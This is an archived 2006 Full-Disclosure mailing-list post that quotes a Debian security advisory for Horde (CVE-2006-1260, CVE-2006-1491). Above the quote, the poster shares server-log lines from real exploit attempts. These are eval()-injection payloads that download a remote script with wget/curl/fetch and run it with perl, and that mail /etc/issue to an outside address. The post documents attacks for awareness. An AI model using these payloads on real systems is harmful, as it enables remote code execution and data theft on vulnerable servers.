| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri Apr 14 16:07:04 2006 From: nodialtone at comcast.net (Byron Copeland) Subject: [SECURITY] [DSA 1034-1] New horde2 packages fixseveral vulnerabilities Here's another attempt: GET /horde//services/help/?show=about&module=;%22 .passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47). %22dary.6te.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22dary.6te.net% 22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22dary.6te.net%22.chr(47).%22h;perl%20h ;rm%20-rf%20h*%22);'. HTTP/1.1" 404 77 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" :) On Fri, 2006-04-14 at 10:49, <...> wrote: > <from [funsec]> > (thx Henderson, Dennis K.) > > Which web server would be a target for this GET? > > Not sure what group to post this to but I'm sure having fun watching the > attempts.. > > :) > > > > > GET > /horde2/services/help/?show=about&module=;%22.passthru(%22cat%20%22.chr( > 47).%22etc%22.chr(47).%22issue%20%7Cmail%20-s%20ho2%20p0wd3r31337@...il. > com%22);'. HTTP/1.1 > Accept: */* > Accept-Language: en-us > Accept-Encoding: gzip, deflate > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) > Host: x.x.x.x > Connection: Close > > </from [funsec]> > > ----- Original Message ----- > From: "Moritz Muehlenhoff" <jmm@...ian.org> > To: <debian-security-announce@...ts.debian.org> > Sent: Friday, April 14, 2006 4:42 PM > Subject: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages > fixseveral vulnerabilities > > > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > - -------------------------------------------------------------------------- > > Debian Security Advisory DSA 1034-1 security@...ian.org > > http://www.debian.org/security/ Moritz Muehlenhoff > > April 14th, 2006 http://www.debian.org/security/faq > > - -------------------------------------------------------------------------- > > > > Package : horde2 > > Vulnerability : several > > Problem-Type : remote > > Debian-specific: no > > CVE ID : CVE-2006-1260 CVE-2006-1491 > > > > Several remote vulnerabilities have been discovered in the Horde web > > application framework, which may lead to the execution of arbitrary > > web script code. The Common Vulnerabilities and Exposures project > > identifies the following problems: > > > > CVE-2006-1260 > > > > Null characters in the URL parameter bypass a sanity check, which > > allowed remote attackers to read arbitrary files, which allowed > > information disclosure. > > > > CVE-2006-1491 > > > > User input in the help viewer was passed unsanitised to the eval() > > function, which allowed injection of arbitrary web code. > > > > > > The old stable distribution (woody) doesn't contain horde2 packages. > > > > For the stable distribution (sarge) these problems have been fixed in > > version 2.2.8-1sarge2. > > > > The unstable distribution (sid) does no longer contain horde2 packages. > > > > We recommend that you upgrade your horde2 package. > > > > > > Upgrade Instructions > > - -------------------- > > > > wget url > > will fetch the file for you > > dpkg -i file.deb > > will install the referenced file. > > > > If you are using the apt-get package manager, use the line for > > sources.list as given below: > > > > apt-get update > > will update the internal database > > apt-get upgrade > > will install corrected packages > > > > You may use an automated update by adding the resources from the > > footer to the proper configuration. > > > > > > Debian GNU/Linux 3.1 alias sarge > > - -------------------------------- > > > > Source archives: > > > > > > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.dsc > > Size/MD5 checksum: 575 acf3f1924f04e2faddfd06ba9b01820e > > > > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.diff.gz > > Size/MD5 checksum: 39504 fb338c016b70e69fa4b867fa116b86dc > > > > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8.orig.tar.gz > > Size/MD5 checksum: 683005 89961af4e4488a908147d7b3a0dc3b44 > > > > Architecture independent components: > > > > > > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2_all.deb > > Size/MD5 checksum: 721398 35fa1bf8bf8b4f2be1076501b984367a > > > > > > These files will probably be moved into the stable distribution on > > its next update. > > > > - --------------------------------------------------------------------------------- > > For apt-get: deb http://security.debian.org/ stable/updates main > > For dpkg-ftp: ftp://security.debian.org/debian-security > > dists/stable/updates/main > > Mailing list: debian-security-announce@...ts.debian.org > > Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg> > > -----BEGIN PGP SIGNATURE----- > > Version: GnuPG v1.4.3 (GNU/Linux) > > > > iD8DBQFEP7SJXm3vHE4uyloRAsVVAJ4n9UoO57tJYCw1JePujnjy90XFvACg3DLn > > nrfwvObZjSThW+pXcD8NI38= > > =BIdm > > -----END PGP SIGNATURE----- > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists